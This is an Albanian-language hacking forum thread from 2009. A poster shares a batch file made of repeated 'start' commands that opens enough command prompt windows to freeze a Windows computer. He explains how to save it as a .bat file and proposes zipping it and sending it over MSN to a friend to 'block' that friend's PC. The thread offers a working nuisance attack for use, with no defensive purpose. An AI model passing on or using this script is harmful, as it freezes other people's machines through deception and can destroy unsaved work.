Ahg Security Albanian Hackers Group & Al-hosting.com
Welocme---------Mirese Erdhet

ahg-security

Mirse erdhet ne forumin tone,shpresoj tia kaloni sa me mire
,,Ju lutem regjistrohuni....
Ne kete forum do tia kaloni shume mire dhe shpresojme tju pelqeje sa me shume
ne jemi munduar qe tju krijojme kushte qe te ndiheni sa me mire ne kete forum


hap 1000000 comand prompt njeheresh deri ne bllokimin e kompjuterit

Shko poshtë

hap 1000000 comand prompt njeheresh deri ne bllokimin e kompjuterit

Mesazh  Resert prej Fri Sep 25, 2009 11:36 am

start
start
start
start
@REN
kete kod duhet ta vondosni ne notepad.save as <>save as type<>Aq here sa te shkruani start aq here do hapen dritare te comand prompt.mund te perdorni winrar ose zip per ta derguar edhe me ane te msn-se ndonje miku qe doni ti bllokoni pc-ne.
avatar
Resert

Numri i postimeve : 11
Join date : 25/09/2009

Shiko profilin e anëtarit

Mbrapsht në krye Shko poshtë

Re: hap 1000000 comand prompt njeheresh deri ne bllokimin e kompjuterit

Mesazh  Resert prej Fri Sep 25, 2009 11:36 am

sory ruajeni si file .bat
avatar
Resert

Numri i postimeve : 11
Join date : 25/09/2009

Shiko profilin e anëtarit

Mbrapsht në krye Shko poshtë

Mbrapsht në krye


 
Drejtat e ktij Forumit:
Ju nuk mund ti përgjigjeni temave të këtij forumi